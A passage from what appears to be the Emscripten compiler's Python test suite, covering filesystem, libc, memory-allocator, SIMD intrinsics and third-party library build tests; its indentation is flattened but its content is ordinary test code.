self.emcc_args = orig_compiler_opts + ['-D' + fs]
if self.get_setting('WASMFS'):
if fs == 'NODEFS':
# TODO: NODEFS in WasmFS
continue
self.emcc_args += ['-sFORCE_FILESYSTEM']
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
self.do_run_in_out_file_test('unistd/access.c', js_engines=[config.NODE_JS])
# Node.js fs.chmod is nearly no-op on Windows
# TODO: NODERAWFS in WasmFS
if not WINDOWS and not self.get_setting('WASMFS'):
self.emcc_args = orig_compiler_opts
self.set_setting('NODERAWFS')
self.do_run_in_out_file_test('unistd/access.c', js_engines=[config.NODE_JS])
def test_unistd_curdir(self):
self.uses_es6 = True
self.do_run_in_out_file_test('unistd/curdir.c')
@also_with_noderawfs
def test_unistd_close(self):
self.do_run_in_out_file_test('unistd/close.c')
@also_with_noderawfs
def test_unistd_pipe(self):
self.do_runf(test_file('unistd/pipe.c'), 'success')
@also_with_noderawfs
def test_unistd_dup(self):
self.do_run_in_out_file_test('unistd/dup.c')
def test_unistd_truncate(self):
self.uses_es6 = True
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS']:
self.emcc_args = orig_compiler_opts + ['-D' + fs]
if self.get_setting('WASMFS'):
if fs == 'NODEFS':
# TODO: NODEFS in WasmFS
continue
self.emcc_args += ['-sFORCE_FILESYSTEM']
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
self.do_run_in_out_file_test('unistd/truncate.c', js_engines=[config.NODE_JS])
@no_windows("Windows throws EPERM rather than EACCES or EINVAL")
@unittest.skipIf(WINDOWS or os.geteuid() == 0, "Root access invalidates this test by being able to write on readonly files")
def test_unistd_truncate_noderawfs(self):
self.uses_es6 = True
self.set_setting('NODERAWFS')
self.maybe_closure()
self.do_run_in_out_file_test('unistd/truncate.c', js_engines=[config.NODE_JS])
@also_with_standalone_wasm()
def test_unistd_sysconf(self):
self.do_run_in_out_file_test('unistd/sysconf.c')
@no_asan('ASan alters memory layout')
def test_unistd_sysconf_phys_pages(self):
filename = test_file('unistd/sysconf_phys_pages.c')
if self.get_setting('ALLOW_MEMORY_GROWTH'):
expected = (2 * 1024 * 1024 * 1024) // webassembly.WASM_PAGE_SIZE
else:
expected = 16 * 1024 * 1024 // webassembly.WASM_PAGE_SIZE
self.do_runf(filename, str(expected) + ', errno: 0')
@no_windows('https://github.com/emscripten-core/emscripten/issues/8882')
def test_unistd_unlink(self):
self.clear()
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS']:
if fs == 'NODEFS' and self.get_setting('WASMFS'):
# TODO: NODEFS in WasmFS
continue
self.emcc_args = orig_compiler_opts + ['-D' + fs]
# symlinks on node.js on non-linux behave differently (e.g. on Windows they require administrative privileges)
# so skip testing those bits on that combination.
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
if WINDOWS:
self.emcc_args += ['-DNO_SYMLINK=1']
if MACOS:
continue
self.do_runf(test_file('unistd/unlink.c'), 'success', js_engines=[config.NODE_JS])
# Several differences/bugs on non-linux including https://github.com/nodejs/node/issues/18014
# TODO: NODERAWFS in WasmFS
if not WINDOWS and not MACOS and not self.get_setting('WASMFS'):
self.emcc_args = orig_compiler_opts + ['-DNODERAWFS']
# 0 if root user
if os.geteuid() == 0:
self.emcc_args += ['-DSKIP_ACCESS_TESTS']
self.set_setting('NODERAWFS')
self.do_runf(test_file('unistd/unlink.c'), 'success', js_engines=[config.NODE_JS])
@parameterized({
'memfs': (['-DMEMFS'], False),
'nodefs': (['-DNODEFS', '-lnodefs.js'], True)
})
def test_unistd_links(self, args, nodefs):
self.emcc_args += args
if WINDOWS and nodefs:
self.skipTest('Skipping NODEFS part of this test for test_unistd_links on Windows, since it would require administrative privileges.')
# Also, other detected discrepancies if you do end up running this test on NODEFS:
# test expects /, but Windows gives \ as path slashes.
# Calling readlink() on a non-link gives error 22 EINVAL on Unix, but simply error 0 OK on Windows.
if self.get_setting('WASMFS'):
if nodefs:
self.skipTest('TODO: wasmfs+node')
self.emcc_args += ['-sFORCE_FILESYSTEM']
self.do_run_in_out_file_test('unistd/links.c', js_engines=[config.NODE_JS])
@no_windows('Skipping NODEFS test, since it would require administrative privileges.')
def test_unistd_symlink_on_nodefs(self):
# Also, other detected discrepancies if you do end up running this test on NODEFS:
# test expects /, but Windows gives \ as path slashes.
# Calling readlink() on a non-link gives error 22 EINVAL on Unix, but simply error 0 OK on Windows.
self.emcc_args += ['-lnodefs.js']
self.do_run_in_out_file_test('unistd/symlink_on_nodefs.c', js_engines=[config.NODE_JS])
@also_with_wasm_bigint
def test_unistd_io(self):
self.set_setting('DEFAULT_LIBRARY_FUNCS_TO_INCLUDE', ['$ERRNO_CODES'])
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS']:
self.clear()
self.emcc_args = orig_compiler_opts + ['-D' + fs]
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
self.do_run_in_out_file_test('unistd/io.c')
@no_windows('https://github.com/emscripten-core/emscripten/issues/8882')
def test_unistd_misc(self):
self.set_setting('LLD_REPORT_UNDEFINED')
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS']:
self.emcc_args = orig_compiler_opts + ['-D' + fs]
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
self.do_run_in_out_file_test('unistd/misc.c', js_engines=[config.NODE_JS], interleaved_output=False)
# i64s in the API, which we'd need to legalize for JS, so in standalone mode
# all we can test is wasm VMs
@also_with_standalone_wasm(wasm2c=True)
def test_posixtime(self):
self.banned_js_engines = [config.V8_ENGINE] # v8 lacks monotonic time
self.do_core_test('test_posixtime.c')
def test_uname(self):
self.do_core_test('test_uname.c')
def test_unary_literal(self):
self.do_core_test('test_unary_literal.cpp')
def test_env(self):
expected = read_file(test_file('env/output.txt'))
self.do_runf(test_file('env/src.c'), [
expected.replace('{{{ THIS_PROGRAM }}}', self.in_dir('src.js')).replace('\\', '/'), # node, can find itself properly
expected.replace('{{{ THIS_PROGRAM }}}', './this.program') # spidermonkey, v8
])
def test_environ(self):
expected = read_file(test_file('env/output-mini.txt'))
self.do_runf(test_file('env/src-mini.c'), [
expected.replace('{{{ THIS_PROGRAM }}}', self.in_dir('src-mini.js')).replace('\\', '/'), # node, can find itself properly
expected.replace('{{{ THIS_PROGRAM }}}', './this.program') # spidermonkey, v8
])
def test_systypes(self):
self.do_core_test('test_systypes.c')
def test_stddef(self):
self.do_core_test('test_stddef.cpp')
self.do_core_test('test_stddef.cpp', force_c=True)
def test_getloadavg(self):
self.do_core_test('test_getloadavg.c')
def test_nl_types(self):
self.do_core_test('test_nl_types.c')
def test_799(self):
src = test_file('799.cpp')
self.do_runf(src, '''Set PORT family: 0, port: 3979
Get PORT family: 0
PORT: 3979
''')
def test_ctype(self):
self.do_core_test('test_ctype.c')
def test_strcasecmp(self):
self.do_core_test('test_strcasecmp.c')
def test_atomic(self):
self.do_core_test('test_atomic.c')
def test_atomic_cxx(self):
# the wasm backend has lock-free atomics, but not asm.js or asm2wasm
self.emcc_args += ['-DIS_64BIT_LOCK_FREE=1']
self.do_core_test('test_atomic_cxx.cpp')
# TODO: test with USE_PTHREADS in wasm backend as well
def test_phiundef(self):
self.do_core_test('test_phiundef.c')
def test_netinet_in(self):
self.do_run_in_out_file_test('netinet/in.cpp')
@needs_dylink
def test_main_module_static_align(self):
if self.get_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('no shared modules with memory growth')
self.set_setting('MAIN_MODULE')
self.do_core_test('test_main_module_static_align.cpp')
# libc++ tests
def test_iostream_and_determinism(self):
create_file('src.cpp', '''
#include <iostream>
int main()
{
std::cout << "hello world" << std::endl << 77 << "." << std::endl;
return 0;
}
''')
num = 5
for i in range(num):
print('(iteration %d)' % i)
# add some timing nondeterminism here, not that we need it, but whatever
time.sleep(random.random() / (10 * num))
self.do_runf('src.cpp', 'hello world\n77.\n')
# Verify that this build is identical to the previous one
if os.path.exists('src.js.previous'):
self.assertBinaryEqual('src.js', 'src.js.previous')
shutil.copy2('src.js', 'src.js.previous')
# Same but for the wasm file.
if self.is_wasm() and not self.get_setting('WASM2JS'):
if os.path.exists('src.wasm.previous'):
self.assertBinaryEqual('src.wasm', 'src.wasm.previous')
shutil.copy2('src.wasm', 'src.wasm.previous')
def test_stdvec(self):
self.do_core_test('test_stdvec.cpp')
def test_random_device(self):
self.maybe_closure()
self.do_core_test('test_random_device.cpp')
def test_reinterpreted_ptrs(self):
self.do_core_test('test_reinterpreted_ptrs.cpp')
def test_js_libraries(self):
create_file('main.cpp', '''
#include <stdio.h>
extern "C" {
extern void printey();
extern int calcey(int x, int y);
}
int main() {
printey();
printf("*%d*\\n", calcey(10, 22));
return 0;
}
''')
create_file('mylib1.js', '''
mergeInto(LibraryManager.library, {
printey: function() {
out('hello from lib!');
}
});
''')
create_file('mylib2.js', '''
mergeInto(LibraryManager.library, {
calcey: function(x, y) {
return x + y;
}
});
''')
self.emcc_args += ['--js-library', 'mylib1.js', '--js-library', 'mylib2.js']
self.do_runf('main.cpp', 'hello from lib!\n*32*\n')
def test_unicode_js_library(self):
create_file('main.cpp', '''
#include <stdio.h>
extern "C" {
extern void printey();
}
int main() {
printey();
return 0;
}
''')
self.emcc_args += ['--js-library', test_file('unicode_library.js')]
self.do_runf('main.cpp', u'Unicode snowman \u2603 says hello!')
def test_funcptr_import_type(self):
self.emcc_args += ['--js-library', test_file('core/test_funcptr_import_type.js')]
self.do_core_test('test_funcptr_import_type.cpp')
@no_asan('ASan does not work with EXPORT_ALL')
def test_constglobalunion(self):
self.set_setting('EXPORT_ALL')
self.do_run(r'''
#include <stdio.h>
struct one_const {
long a;
};
struct two_consts {
long a;
long b;
};
union some_consts {
struct one_const one;
struct two_consts two;
};
union some_consts my_consts = {{
1
}};
struct one_const addr_of_my_consts = {
(long)(&my_consts)
};
int main(void) {
printf("%li\n", (long)!!addr_of_my_consts.a);
return 0;
}
''', '1')
### 'Medium' tests
def test_fannkuch(self):
results = [(1, 0), (2, 1), (3, 2), (4, 4), (5, 7), (6, 10), (7, 16), (8, 22)]
self.build(test_file('fannkuch.cpp'))
for i, j in results:
print(i, j)
self.do_run('fannkuch.js', 'Pfannkuchen(%d) = %d.' % (i, j), args=[str(i)], no_build=True)
def test_raytrace(self):
# TODO: Should we remove this test?
self.skipTest('Relies on double value rounding, extremely sensitive')
src = read_file(test_file('raytrace.cpp')).replace('double', 'float')
output = read_file(test_file('raytrace.ppm'))
self.do_run(src, output, args=['3', '16'])
def test_fasta(self):
results = [(1, '''GG*ctt**tgagc*'''),
(20, '''GGCCGGGCGCGGTGGCTCACGCCTGTAATCCCAGCACTTT*cttBtatcatatgctaKggNcataaaSatgtaaaDcDRtBggDtctttataattcBgtcg**tacgtgtagcctagtgtttgtgttgcgttatagtctatttgtggacacagtatggtcaaa**tgacgtcttttgatctgacggcgttaacaaagatactctg*'''),
(50, '''GGCCGGGCGCGGTGGCTCACGCCTGTAATCCCAGCACTTTGGGAGGCCGAGGCGGGCGGA*TCACCTGAGGTCAGGAGTTCGAGACCAGCCTGGCCAACAT*cttBtatcatatgctaKggNcataaaSatgtaaaDcDRtBggDtctttataattcBgtcg**tactDtDagcctatttSVHtHttKtgtHMaSattgWaHKHttttagacatWatgtRgaaa**NtactMcSMtYtcMgRtacttctWBacgaa**agatactctgggcaacacacatacttctctcatgttgtttcttcggacctttcataacct**ttcctggcacatggttagctgcacatcacaggattgtaagggtctagtggttcagtgagc**ggaatatcattcgtcggtggtgttaatctatctcggtgtagcttataaatgcatccgtaa**gaatattatgtttatttgtcggtacgttcatggtagtggtgtcgccgatttagacgtaaa**ggcatgtatg*''')]
old = self.emcc_args
orig_src = read_file(test_file('fasta.cpp'))
def test(extra_args):
self.emcc_args = old + extra_args
for t in ['float', 'double']:
print(t)
src = orig_src.replace('double', t)
with open('fasta.cpp', 'w') as f:
f.write(src)
self.build('fasta.cpp')
for arg, output in results:
self.do_run('fasta.js', output, args=[str(arg)], output_nicerizer=lambda x: x.replace('\n', '*'), no_build=True)
shutil.copyfile('fasta.js', '%s.js' % t)
test([])
@needs_non_trapping_float_to_int
def test_fasta_nontrapping(self):
self.emcc_args += ['-mnontrapping-fptoint']
self.test_fasta()
def test_whets(self):
self.do_runf(test_file('whets.cpp'), 'Single Precision C Whetstone Benchmark')
# node is slower, and fail on 64-bit
@require_v8
@no_asan('depends on the specifics of memory size, which for asan we are forced to increase')
@no_lsan('depends on the specifics of memory size, which for lsan we are forced to increase')
def test_dlmalloc_inline(self):
# needed with typed arrays
self.set_setting('INITIAL_MEMORY', '128mb')
src = read_file(path_from_root('system/lib/dlmalloc.c')) + '\n\n\n' + read_file(test_file('dlmalloc_test.c'))
self.do_run(src, '*1,0*', args=['200', '1'], force_c=True)
self.do_run('src.js', '*400,0*', args=['400', '400'], force_c=True, no_build=True)
# node is slower, and fail on 64-bit
@require_v8
@no_asan('depends on the specifics of memory size, which for asan we are forced to increase')
@no_lsan('depends on the specifics of memory size, which for lsan we are forced to increase')
@no_wasmfs('wasmfs does some malloc/free during startup, fragmenting the heap, leading to differences later')
def test_dlmalloc(self):
# needed with typed arrays
self.set_setting('INITIAL_MEMORY', '128mb')
# Linked version
self.do_runf(test_file('dlmalloc_test.c'), '*1,0*', args=['200', '1'])
self.do_run('dlmalloc_test.js', '*400,0*', args=['400', '400'], no_build=True)
# TODO: do this in other passes too, passing their opts into emcc
if self.emcc_args == []:
# emcc should build in dlmalloc automatically, and do all the sign correction etc. for it
try_delete('src.js')
self.run_process([EMCC, test_file('dlmalloc_test.c'), '-sINITIAL_MEMORY=128MB', '-o', 'src.js'], stdout=PIPE, stderr=self.stderr_redirect)
self.do_run(None, '*1,0*', ['200', '1'], no_build=True)
self.do_run(None, '*400,0*', ['400', '400'], no_build=True)
# The same for new and all its variants
src = read_file(test_file('new.cpp'))
for new, delete in [
('malloc(100)', 'free'),
('new char[100]', 'delete[]'),
('new Structy', 'delete'),
('new int', 'delete'),
('new Structy[10]', 'delete[]'),
]:
self.do_run(src.replace('{{{ NEW }}}', new).replace('{{{ DELETE }}}', delete), '*1,0*')
# Tests that a large allocation should gracefully fail
@no_asan('the memory size limit here is too small for asan')
@no_lsan('the memory size limit here is too small for lsan')
def test_dlmalloc_large(self):
self.emcc_args += ['-sABORTING_MALLOC=0', '-sALLOW_MEMORY_GROWTH=1', '-sMAXIMUM_MEMORY=128MB']
self.do_runf(test_file('dlmalloc_test_large.c'), '0 0 0 1')
@no_asan('asan also changes malloc, and that ends up linking in new twice')
@no_lsan('lsan also changes malloc, and that ends up linking in new twice')
def test_dlmalloc_partial(self):
# present part of the symbols of dlmalloc, not all
src = read_file(test_file('new.cpp')).replace('{{{ NEW }}}', 'new int').replace('{{{ DELETE }}}', 'delete') + '''
#include <emscripten/console.h>
#include <new>
void* operator new(size_t size) {
emscripten_console_log("new!");
return malloc(size);
}
'''
self.do_run(src, 'new!\n*1,0*')
@no_asan('asan also changes malloc, and that ends up linking in new twice')
@no_lsan('lsan also changes malloc, and that ends up linking in new twice')
def test_dlmalloc_partial_2(self):
if 'SAFE_HEAP' in str(self.emcc_args):
self.skipTest('we do unsafe stuff here')
# present part of the symbols of dlmalloc, not all. malloc is harder to link than new which is weak.
self.do_core_test('test_dlmalloc_partial_2.c', assert_returncode=NON_ZERO)
def test_libcxx(self):
self.do_runf(test_file('hashtest.cpp'),
'june -> 30\nPrevious (in alphabetical order) is july\nNext (in alphabetical order) is march')
self.do_run('''
#include <set>
#include <stdio.h>
int main() {
std::set<int> fetchOriginatorNums;
fetchOriginatorNums.insert(171);
printf("hello world\\n");
return 0;
}
''', 'hello world')
def test_typeid(self):
self.do_core_test('test_typeid.cpp')
def test_static_variable(self):
# needs atexit
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_static_variable.cpp')
def test_fakestat(self):
self.do_core_test('test_fakestat.c')
@also_with_standalone_wasm()
def test_mmap(self):
# ASan needs more memory, but that is set up separately
if '-fsanitize=address' not in self.emcc_args:
self.set_setting('INITIAL_MEMORY', '128mb')
self.do_core_test('test_mmap.c')
def test_mmap_file(self):
for extra_args in [[]]:
self.emcc_args += ['--embed-file', 'data.dat'] + extra_args
x = 'data from the file........'
s = ''
while len(s) < 9000:
if len(s) + len(x) < 9000:
s += x
continue
s += '.'
assert len(s) == 9000
create_file('data.dat', s)
self.do_runf(test_file('mmap_file.c'), '*\n' + s[0:20] + '\n' + s[4096:4096 + 20] + '\n*\n')
@no_lsan('Test code contains memory leaks')
def test_cubescript(self):
# uses register keyword
self.emcc_args += ['-std=c++03', '-Wno-dynamic-class-memaccess']
self.maybe_closure()
self.emcc_args += ['-I', test_file('third_party/cubescript')]
# Test code contains memory leaks
if '-fsanitize=address' in self.emcc_args:
self.emcc_args += ['--pre-js', test_file('asan-no-leak.js')]
def test():
src = test_file('third_party/cubescript/command.cpp')
self.do_runf(src, '*\nTemp is 33\n9\n5\nhello, everyone\n*')
test()
print('asyncify') # extra coverage
self.set_setting('ASYNCIFY')
test()
@needs_dylink
def test_relocatable_void_function(self):
self.set_setting('RELOCATABLE')
self.do_core_test('test_relocatable_void_function.c')
@wasm_simd
def test_wasm_intrinsics_simd(self):
def run():
self.do_runf(test_file('test_wasm_intrinsics_simd.c'), 'Success!')
# Improves test readability
self.emcc_args.append('-Wno-c++11-narrowing')
self.emcc_args.extend(['-Wpedantic', '-Werror', '-Wall', '-xc++'])
run()
self.emcc_args.append('-funsigned-char')
run()
# Tests invoking the NEON SIMD API via arm_neon.h header
@wasm_simd
def test_neon_wasm_simd(self):
self.emcc_args.append('-Wno-c++11-narrowing')
self.emcc_args.append('-mfpu=neon')
self.emcc_args.append('-msimd128')
self.do_runf(test_file('neon/test_neon_wasm_simd.cpp'), 'Success!')
# Tests invoking the SIMD API via x86 SSE1 xmmintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
@no_safe_heap('has unaligned 64-bit operations in wasm')
def test_sse1(self):
src = test_file('sse/test_sse1.cpp')
self.run_process([shared.CLANG_CXX, src, '-msse', '-o', 'test_sse1', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_sse1', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-msse']
self.maybe_closure()
self.do_runf(src, native_result)
# Tests invoking the SIMD API via x86 SSE2 emmintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
@no_safe_heap('has unaligned 64-bit operations in wasm')
@is_slow_test
def test_sse2(self):
src = test_file('sse/test_sse2.cpp')
self.run_process([shared.CLANG_CXX, src, '-msse2', '-Wno-argument-outside-range', '-o', 'test_sse2', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_sse2', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-msse2', '-Wno-argument-outside-range']
self.maybe_closure()
self.do_runf(src, native_result)
# Tests invoking the SIMD API via x86 SSE3 pmmintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
def test_sse3(self):
src = test_file('sse/test_sse3.cpp')
self.run_process([shared.CLANG_CXX, src, '-msse3', '-Wno-argument-outside-range', '-o', 'test_sse3', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_sse3', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-msse3', '-Wno-argument-outside-range']
self.maybe_closure()
self.do_runf(src, native_result)
# Tests invoking the SIMD API via x86 SSSE3 tmmintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
def test_ssse3(self):
src = test_file('sse/test_ssse3.cpp')
self.run_process([shared.CLANG_CXX, src, '-mssse3', '-Wno-argument-outside-range', '-o', 'test_ssse3', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_ssse3', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-mssse3', '-Wno-argument-outside-range']
self.maybe_closure()
self.do_runf(src, native_result)
# Tests invoking the SIMD API via x86 SSE4.1 smmintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
@is_slow_test
def test_sse4_1(self):
src = test_file('sse/test_sse4_1.cpp')
if not self.is_optimizing() and '-fsanitize=address' in self.emcc_args:
# ASan with -O0 fails with:
# Compiling function #69:"__original_main" failed: local count too large
self.emcc_args.append('-O1')
self.run_process([shared.CLANG_CXX, src, '-msse4.1', '-Wno-argument-outside-range', '-o', 'test_sse4_1', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_sse4_1', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-msse4.1', '-Wno-argument-outside-range']
self.maybe_closure()
self.do_runf(src, native_result)
# Tests invoking the SIMD API via x86 SSE4.2 nmmintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
def test_sse4_2(self):
src = test_file('sse/test_sse4_2.cpp')
self.run_process([shared.CLANG_CXX, src, '-msse4.2', '-Wno-argument-outside-range', '-o', 'test_sse4_2', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_sse4_2', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-msse4.2', '-Wno-argument-outside-range']
self.maybe_closure()
self.do_runf(src, native_result)
# Tests invoking the SIMD API via x86 AVX avxintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
@is_slow_test
@no_asan('local count too large')
def test_avx(self):
src = test_file('sse/test_avx.cpp')
self.run_process([shared.CLANG_CXX, src, '-mavx', '-Wno-argument-outside-range', '-o', 'test_avx', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_avx', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-mavx', '-Wno-argument-outside-range']
self.maybe_closure()
self.do_runf(src, native_result)
@wasm_simd
def test_sse_diagnostics(self):
self.emcc_args.remove('-Werror')
src = test_file('sse/test_sse_diagnostic.cpp')
p = self.run_process(
[shared.EMXX, src, '-msse', '-DWASM_SIMD_COMPAT_SLOW'] + self.get_emcc_args(),
stderr=PIPE)
self.assertContained('Instruction emulated via slow path.', p.stderr)
@requires_native_clang
@wasm_relaxed_simd
def test_relaxed_simd_implies_simd128(self):
src = test_file('sse/test_sse1.cpp')
self.build(src, emcc_args=['-msse'])
@no_asan('call stack exceeded on some versions of node')
def test_gcc_unmangler(self):
self.emcc_args += ['-I' + test_file('third_party/libiberty')]
self.do_runf(test_file('third_party/libiberty/cp-demangle.c'), '*d_demangle(char const*, int, unsigned int*)*', args=['_ZL10d_demanglePKciPj'])
@needs_make('make')
def test_lua(self):
self.emcc_args.remove('-Werror')
libs = self.get_library('third_party/lua', [Path('src/lua.o'), Path('src/liblua.a')], make=['make', 'generic'], configure=None)
self.do_run('',
'hello lua world!\n17\n1\n2\n3\n4\n7',
args=['-e', '''print("hello lua world!");print(17);for x = 1,4 do print(x) end;print(10-3)'''],
libraries=libs,
includes=[test_file('lua')],
output_nicerizer=lambda output: output.replace('\n\n', '\n').replace('\n\n', '\n'))
@no_asan('issues with freetype itself')
@needs_make('configure script')
@is_slow_test
def test_freetype(self):
self.add_pre_run("FS.createDataFile('/', 'font.ttf', %s, true, false, false);" % str(
list(bytearray(read_binary(test_file('freetype/LiberationSansBold.ttf'))))
))
# Not needed for js, but useful for debugging
shutil.copyfile(test_file('freetype/LiberationSansBold.ttf'), 'font.ttf')
# Main
self.do_run_from_file(test_file('freetype/main.c'),
test_file('freetype/ref.txt'),
args=['font.ttf', 'test!', '150', '120', '25'],
libraries=self.get_freetype_library(),
includes=[test_file('third_party/freetype/include')])
# github issue 324
print('[issue 324]')
self.do_run_from_file(test_file('freetype/main_2.c'),
test_file('freetype/ref_2.txt'),
args=['font.ttf', 'w', '32', '32', '25'],
libraries=self.get_freetype_library(),
includes=[test_file('third_party/freetype/include')])
print('[issue 324 case 2]')
self.do_run_from_file(test_file('freetype/main_3.c'),
test_file('freetype/ref_3.txt'),
args=['font.ttf', 'W', '32', '32', '0'],
libraries=self.get_freetype_library(),
includes=[test_file('third_party/freetype/include')])
print('[issue 324 case 3]')
self.do_run('main_3.js',
read_file(test_file('freetype/ref_4.txt')),
args=['font.ttf', 'ea', '40', '32', '0'],
no_build=True)
@no_asan('local count too large for VMs')
@is_slow_test
def test_sqlite(self):
self.set_setting('DISABLE_EXCEPTION_CATCHING')
self.set_setting('EXPORTED_FUNCTIONS', ['_main', '_sqlite3_open', '_sqlite3_close', '_sqlite3_exec', '_sqlite3_free'])
if '-g' in self.emcc_args:
print("disabling inlining") # without registerize (which -g disables), we generate huge amounts of code
self.set_setting('INLINING_LIMIT')
# newer clang has a warning for implicit conversions that lose information,
# which happens in sqlite (see #9138)
self.emcc_args += ['-Wno-implicit-int-float-conversion']
# newer clang warns about "suspicious concatenation of string literals in an
# array initialization; did you mean to separate the elements with a comma?"
self.emcc_args += ['-Wno-string-concatenation']
# ignore unknown flags, which lets the above flags be used on github CI
# before the LLVM change rolls in (the same LLVM change that adds the
# warning also starts to warn on it)
self.emcc_args += ['-Wno-unknown-warning-option']
self.emcc_args += ['-Wno-pointer-bool-conversion']
self.emcc_args += ['-I' + test_file('third_party/sqlite')]
src = '''
#define SQLITE_DISABLE_LFS
#define LONGDOUBLE_TYPE double
#define SQLITE_INT64_TYPE long long int
#define SQLITE_THREADSAFE 0
'''
src += read_file(test_file('third_party/sqlite/sqlite3.c'))
src += read_file(test_file('sqlite/benchmark.c'))
self.do_run(src,
read_file(test_file('sqlite/benchmark.txt')),
includes=[test_file('sqlite')],
force_c=True)
@needs_make('mingw32-make')
@is_slow_test
@parameterized({
'cmake': (True,),
'configure': (False,)
})
def test_zlib(self, use_cmake):
if WINDOWS and not use_cmake:
self.skipTest("Windows cannot run configure sh scripts")
self.maybe_closure()
self.emcc_args.append('-Wno-shift-negative-value')
if '-g' in self.emcc_args:
self.emcc_args.append('-gsource-map') # more source maps coverage
if use_cmake:
make_args = []
configure = ['cmake', '.']
else:
make_args = ['libz.a']
configure = ['sh', './configure']
self.do_run_from_file(
test_file('third_party/zlib/example.c'),
test_file('core/test_zlib.out'),
libraries=self.get_library('third_party/zlib', 'libz.a', make_args=make_args, configure=configure),
includes=[test_file('third_party/zlib'), 'building', 'zlib'])
@needs_make('make')
@is_slow_test
@parameterized({
'cmake': (True,),
'autoconf': (False,)
})
# Called thus so it runs late in the alphabetical cycle... it is long
def test_bullet(self, use_cmake):
if WINDOWS and not use_cmake:
self.skipTest("Windows cannot run configure sh scripts")
self.emcc_args += [
'-Wno-c++11-narrowing',
'-Wno-deprecated-register',
'-Wno-writable-strings',
'-Wno-shift-negative-value',
'-Wno-format'
]
# extra testing for ASSERTIONS == 2
if use_cmake:
self.set_setting('ASSERTIONS', 2)
self.emcc_args.append('-Wno-unused-command-line-argument')
self.do_runf(test_file('third_party/bullet/Demos/HelloWorld/HelloWorld.cpp'),
[read_file(test_file('bullet/output.txt')), # different roundings
read_file(test_file('bullet/output2.txt')),
read_file(test_file('bullet/output3.txt')),
read_file(test_file('bullet/output4.txt'))],
libraries=self.get_bullet_library(use_cmake),
includes=[test_file('third_party/bullet/src')])
@unittest.skip('LLVM changes have caused this C++ to no longer compile, https://github.com/emscripten-core/emscripten/issues/14614')
@no_asan('issues with freetype itself')
@needs_make('depends on freetype')
@is_slow_test
def test_poppler(self):
pdf_data = read_binary(test_file('poppler/paper.pdf'))
create_file('paper.pdf.js', str(list(bytearray(pdf_data))))
create_file('pre.js', '''
Module.preRun = function() {
FS.createDataFile('/', 'paper.pdf', eval(read_('paper.pdf.js')), true, false, false);
};
Module.postRun = function() {
var FileData = Array.from(MEMFS.getFileDataAsTypedArray(FS.root.contents['filename-1.ppm']));
out("Data: " + JSON.stringify(FileData.map(function(x) { return unSign(x, 8) })));
};
''')
self.emcc_args += ['--pre-js', 'pre.js', '-sDEFAULT_LIBRARY_FUNCS_TO_INCLUDE=$unSign']
ppm_data = str(list(bytearray(read_binary(test_file('poppler/ref.ppm')))))
self.do_run('', ppm_data.replace(' ', ''),
libraries=self.get_poppler_library(),
args=['-scale-to', '512', 'paper.pdf', 'filename'])
@needs_make('make')
@is_slow_test
def test_openjpeg(self):
def do_test_openjpeg():
def line_splitter(data):
out = ''
counter = 0
for ch in data:
out += ch
if ch == ' ' and counter > 60:
out += '\n'
counter = 0
else:
counter += 1
return out
# remove -g, so we have one test without it by default
self.emcc_args = [x for x in self.emcc_args if x != '-g']
original_j2k = test_file('openjpeg/syntensity_lobby_s.j2k')
image_bytes = list(bytearray(read_binary(original_j2k)))
create_file('pre.js', """
Module.preRun = function() { FS.createDataFile('/', 'image.j2k', %s, true, false, false); };
Module.postRun = function() {
out('Data: ' + JSON.stringify(Array.from(MEMFS.getFileDataAsTypedArray(FS.analyzePath('image.raw').object))));
};
""" % line_splitter(str(image_bytes)))
# ensure libpng is built so that openjpeg's configure step can detect it.
# If we don't do this then we don't know what the state of the cache will be
# and this test would different non-deterministic results based on, for example,
# what other tests had previously run.
self.run_process([EMBUILDER, 'build', 'libpng'])
lib = self.get_library('third_party/openjpeg',
[Path('codec/CMakeFiles/j2k_to_image.dir/index.c.o'),
Path('codec/CMakeFiles/j2k_to_image.dir/convert.c.o'),
Path('codec/CMakeFiles/j2k_to_image.dir/__/common/color.c.o'),
Path('bin/libopenjpeg.a')],
